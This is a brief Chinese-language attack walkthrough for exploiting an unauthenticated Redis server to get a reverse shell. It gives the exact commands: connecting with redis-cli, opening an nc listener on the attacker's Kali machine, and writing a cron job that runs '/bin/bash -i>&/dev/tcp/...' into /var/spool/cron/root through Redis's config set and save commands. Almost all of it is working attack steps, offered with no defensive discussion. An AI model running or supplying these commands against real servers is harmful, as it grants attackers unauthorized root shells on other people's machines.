Redis未授權訪問反彈shell

Redis未授權訪問反彈shell

目標主機：10.104.11.178

攻擊機：kali

攻擊步驟：

1.與目標主機連接

root@kali:~# /usr/redis/redis-cli -h 10.104.11.178

 2.kali主機進行監聽

nc -l -v  -p 9999

 

3.寫入反彈shell語句

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

 4.反彈shell連接成功